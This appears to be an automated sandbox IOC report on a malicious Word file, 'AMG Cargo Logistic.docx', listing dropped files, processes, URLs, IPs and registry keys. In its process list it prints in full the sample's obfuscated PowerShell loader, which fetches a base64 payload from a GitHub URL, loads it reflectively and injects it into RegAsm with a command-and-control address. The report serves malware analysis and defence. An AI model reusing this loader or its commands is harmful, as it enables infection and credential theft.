IOC Report
AMG Cargo Logistic.docx

loading gif

Files

File Path
Type
Category
Malicious
AMG Cargo Logistic.docx
Microsoft Word 2007+
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{6BDC8419-19FD-4A85-B752-6E5B13CC56D9}.tmp
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: Microsoft Corporation, Last Saved By: 91974, Name of Creating Application: Microsoft Excel, Last Printed: Mon Jul 15 16:30:47 2024, Create Time/Date: Mon Oct 21 12:03:58 1996, Last Saved Time/Date: Mon Sep 30 09:11:40 2024, Security: 0
dropped
malicious
C:\Users\user\AppData\Local\Temp\notpad0\logs.dat
data
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\S7UYq0.url
MS Windows 95 Internet shortcut text (URL=<https://og1.in/S7UYq0>), ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\uc on 91.134.96.177.url
MS Windows 95 Internet shortcut text (URL=<http://91.134.96.177/80/uc/>), ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethedomaindskilltechnologywhichcreatednicepersonentirelifetogetbmebackwithnewthingswithichhonestthingsalwayswantobe______seiscutebabygirlever[1].doc
Rich Text Format data, version 1
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\picturewithherimagesverygoodforyourheart[1].tiff
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4ADD57F9.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\70910273.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A16B3B5D.doc
Rich Text Format data, version 1
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B82E11BA.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BB91F1D8.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2A829E0A-7FC7-4D01-A6EB-6F0871F5882C}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{7145407E-C3A4-423E-9375-10CCCC5BE751}.tmp
Targa image data - Map 6 x 7 x 8 +4 +5 "\011"
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{FB277FB3-9DA0-41AB-818A-1B325FC5268F}.tmp
data
dropped
C:\Users\user\AppData\Local\Temp\0gqtl14z.fpz.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\4ob2hxgr.cs2.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\ao0qbvdc.oc4.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\bhvACB4.tmp
Extensible storage engine DataBase, version 0x620, checksum 0x3193001d, page size 32768, DirtyShutdown, Windows version 6.1
dropped
C:\Users\user\AppData\Local\Temp\bhvC227.tmp
Extensible storage engine DataBase, version 0x620, checksum 0x3193001d, page size 32768, DirtyShutdown, Windows version 6.1
dropped
C:\Users\user\AppData\Local\Temp\ohjddwfhhgpyhybdvgvfatodxp
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\zdcjgmqajuavikmhtgirxawvvrrtkae
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\zodwa00f.b2s.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\{264E6551-B505-4744-8418-254F7EAA1471}
data
dropped
C:\Users\user\AppData\Local\Temp\{E9E50C6B-15EE-4B68-B623-585F55730C00}
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\AMG Cargo Logistic.LNK
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:12 2023, mtime=Fri Aug 11 15:42:12 2023, atime=Mon Sep 30 13:24:03 2024, length=788502, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Generic INItialization configuration [misc]
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
data
dropped
C:\Users\user\Desktop\~$G Cargo Logistic.docx
data
dropped
There are 24 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
malicious
C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
malicious
C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtTdHJJbkddJHZlUmJvc0VQUkVmZVJFTkNFKVsxLDNdKydYJy1Kb2luJycpICgoKCd7Mn0nKyd1cicrJ2wnKycgPSB7JysnMX0nKydodCcrJ3QnKydwJysnczovLycrJ3InKydhJysndy5naXRoJysndWJ1c2VyY29udGVudC4nKydjJysnb20vTicrJ29EZXRlY3RPJysnbi8nKydOJysnb0RldGUnKydjJysndE9uLycrJ3InKydlZnMnKycvaGVhZHMvbWEnKydpbi8nKydEZXRhJysnaE5vdGgtJysnVi50JysneHR7MX07IHsyfWJhc2UnKyc2NENvbnRlbnQgPSAoTmV3LU9iJysnamVjdCBTeXN0ZW0nKycuJysnTmV0LlcnKydlYkNsaWVudCkuRG8nKyd3bmxvYWRTdHJpJysnbmcoezJ9dXJsKTsnKycgezInKyd9YmluYXInKyd5Q29udGVudCA9IFtTeXN0ZW0uJysnQ29udmUnKydydF06OkZyJysnb21CYScrJ3NlNjRTJysndCcrJ3JpbmcoezJ9YmFzZTY0Q29udGUnKydudCk7IHsyfWFzc2VtYmx5ID0gJysnW1JlZmxlJysnY3RpbycrJ24uQXNzZW1ibHldOjpMJysnb2FkKHsyJysnfWJpJysnbmEnKydyJysneUMnKydvbnRlJysnbnQpOyBbJysnZG5sJysnaWIuJysnSU8uJysnSG9tJysnZV06OicrJ1YnKydBSScrJygnKyd7MH10eCcrJ3QuQycrJ0ZEUicrJ1JXLycrJzA4Lzc3MS42JysnOS40MzEuMTkvLzpwdCcrJ3RoezB9LCB7MH1kZXNhdGl2JysnYWRveycrJzB9JysnLCB7MH1kZXNhJysndGl2YWRveycrJzB9LCcrJyB7MH1kZXNhdGl2JysnYWRvezAnKyd9LCB7MH0nKydSZWdBcycrJ217MH0nKycsIHsnKycwJysnfScrJ3snKycwfSx7MH17MCcrJ30pJykgLWYgIFtDaEFyXTM0LFtDaEFyXTM5LFtDaEFyXTM2KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([StrInG]$veRbosEPREfeRENCE)[1,3]+'X'-Join'') ((('{2}'+'ur'+'l'+' = {'+'1}'+'ht'+'t'+'p'+'s://'+'r'+'a'+'w.gith'+'ubusercontent.'+'c'+'om/N'+'oDetectO'+'n/'+'N'+'oDete'+'c'+'tOn/'+'r'+'efs'+'/heads/ma'+'in/'+'Deta'+'hNoth-'+'V.t'+'xt{1}; {2}base'+'64Content = (New-Ob'+'ject System'+'.'+'Net.W'+'ebClient).Do'+'wnloadStri'+'ng({2}url);'+' {2'+'}binar'+'yContent = [System.'+'Conve'+'rt]::Fr'+'omBa'+'se64S'+'t'+'ring({2}base64Conte'+'nt); {2}assembly = '+'[Refle'+'ctio'+'n.Assembly]::L'+'oad({2'+'}bi'+'na'+'r'+'yC'+'onte'+'nt); ['+'dnl'+'ib.'+'IO.'+'Hom'+'e]::'+'V'+'AI'+'('+'{0}tx'+'t.C'+'FDR'+'RW/'+'08/771.6'+'9.431.19//:pt'+'th{0}, {0}desativ'+'ado{'+'0}'+', {0}desa'+'tivado{'+'0},'+' {0}desativ'+'ado{0'+'}, {0}'+'RegAs'+'m{0}'+', {'+'0'+'}'+'{'+'0},{0}{0'+'})') -f [ChAr]34,[ChAr]39,[ChAr]36))"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\zdcjgmqajuavikmhtgirxawvvrrtkae"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\zdcjgmqajuavikmhtgirxawvvrrtkae"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\zdcjgmqajuavikmhtgirxawvvrrtkae"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jxitgxaufcsasqatkrvsifqmdfiulluzow"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\manmhp"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ohjddwfhhgpyhybdvgvfatodxp"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ohjddwfhhgpyhybdvgvfatodxp"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qjoweoqbvohlrmpherihlgjmywoyg"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qjoweoqbvohlrmpherihlgjmywoyg"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bdbgfhbcjxzqtsllvbviokedgkxhzxva"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bdbgfhbcjxzqtsllvbviokedgkxhzxva"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bdbgfhbcjxzqtsllvbviokedgkxhzxva"
malicious
There are 8 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://91.134.96.177/80/WRRDFC.txt
91.134.96.177
malicious
maxert.wemnbbsweoipmngbyutrdcunbgrtjeroendns.pro
malicious
http://91.134.96.177/80/uc/seethedomaindskilltechnologywhichcreatednicepersonentirelifetogetbmebackwithnewthingswithichhonestthingsalwayswantobe______seiscutebabygirlever.doc
91.134.96.177
malicious
http://91.134.96.177/80/picturewithherimagesverygoodforyourheart.tIF
91.134.96.177
malicious
http://b.scorecardresearch.com/beacon.js
unknown
http://www.imvu.com/DK
unknown
http://acdn.adnxs.com/ast/ast.js
unknown
http://www.imvu.comr
unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_
unknown
http://ocsp.entrust.net03
unknown
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
unknown
https://contoso.com/License
unknown
https://support.google.com/chrome/?p=plugin_flash
unknown
http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
unknown
http://www.diginotar.nl/cps/pkioverheid0
unknown
https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
unknown
http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
unknown
http://www.nirsoft.net
unknown
https://deff.nelreports.net/api/report?cat=msn
unknown
http://www.nirsoft.netP
unknown
https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
unknown
http://go.micros
unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
unknown
http://91.134.96.177/80/picturewithherimagesverygoodforyourheart.tIFj
unknown
http://cache.btrll.com/default/Pix-1x1.gif
unknown
http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683
unknown
https://www.google.com
unknown
http://geoplugin.net/json.gp/C
unknown
https://og1.in/S7UYq0
172.67.216.244
http://o.aolcdn.com/ads/adswrappermsni.js
unknown
http://cdn.taboola.com/libtrc/msn-home-network/loader.js
unknown
http://www.msn.com/?ocid=iehp
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
unknown
http://static.chartbeat.com/js/chartbeat.js
unknown
http://www.msn.com/de-de/?ocid=iehp
unknown
http://91.134.96.177
unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%
unknown
https://login.yahoo.com/config/login
unknown
http://www.nirsoft.net/
unknown
http://ocsp.entrust.net0D
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
unknown
http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683
unknown
http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(
unknown
https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh
unknown
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
185.199.109.133
http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
unknown
http://nuget.org/NuGet.exe
unknown
https://www.ccleaner.com/go/app_cc_pro_trialkey
unknown
http://crl.entrust.net/server1.crl0
unknown
http://www.imvu.com/cK
unknown
https://contextual.media.net/8/nrrV73987.js
unknown
http://www.imvu.com
unknown
https://contoso.com/Icon
unknown
https://contextual.media.net/
unknown
http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
unknown
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
unknown
http://www.msn.com/
unknown
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
unknown
http://geoplugin.net/json.gp
178.237.33.50
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
unknown
https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
unknown
https://raw.githubusercontent.com
unknown
http://cdn.at.atwola.com/_media/uac/msn.html
unknown
https://www.google.com/accounts/servicelogin
unknown
http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
unknown
https://secure.comodo.com/CPS0
unknown
http://91.134.96.177/80/uc/
unknown
http://go.microsoft.c9V
unknown
https://policies.yahoo.com/w3c/p3p.xml
unknown
http://crl.entrust.net/2048ca.crl0
unknown
http://www.msn.com/advertisement.ad.js
unknown
http://www.ebuddy.com
unknown
There are 67 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
og1.in
172.67.216.244
malicious
maxert.wemnbbsweoipmngbyutrdcunbgrtjeroendns.pro
45.90.89.98
malicious
raw.githubusercontent.com
185.199.109.133
geoplugin.net
178.237.33.50

IPs

IP
Domain
Country
Malicious
45.90.89.98
maxert.wemnbbsweoipmngbyutrdcunbgrtjeroendns.pro
Bulgaria
malicious
91.134.96.177
unknown
France
malicious
172.67.216.244
og1.in
United States
malicious
104.21.78.54
unknown
United States
185.199.109.133
raw.githubusercontent.com
Netherlands
178.237.33.50
geoplugin.net
Netherlands

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\Software\Rmc-EPF38I
exepath
malicious
HKEY_CURRENT_USER\Software\Rmc-EPF38I
licence
malicious
HKEY_CURRENT_USER\Software\Rmc-EPF38I
time
malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
*u/
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Word
Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
av/
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
tx/
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache
Version
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache
Count
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://og1.in/
Type
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://og1.in/
Protocol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://og1.in/
Version
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://og1.in/
Flags
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://og1.in/
CobaltMajorVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://og1.in/
CobaltMinorVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://og1.in/
MsDavExt
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://og1.in/
Expiration
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://og1.in/
EnableBHO
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
o?/
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{E7E4BC40-E76A-11CE-A9BB-00AA004AE837} {000214E6-0000-0000-C000-000000000046} 0xFFFF
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\30D49
30D49
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.0\2057
Options Version
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.0\2057\Option Set 0
Name
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.0\2057\Option Set 0
Data
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.0\2057\Option Set 1
Name
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.0\2057\Option Set 1
Data
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Agency FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aharoni
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Algerian
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Andalus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Angsana New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
AngsanaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aparajita
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arabic Typesetting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Narrow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Rounded MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Baskerville Old Face
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bauhaus 93
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bell MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bernard MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Blackadder ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Poster Compressed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Book Antiqua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookman Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookshelf Symbol 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bradley Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Britannic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Broadway
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Browallia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BrowalliaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Brush Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Californian FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calisto MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria Math
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Candara
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Castellar
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Centaur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Schoolbook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Chiller
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Colonna MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Comic Sans MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Consolas
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Constantia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cooper Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
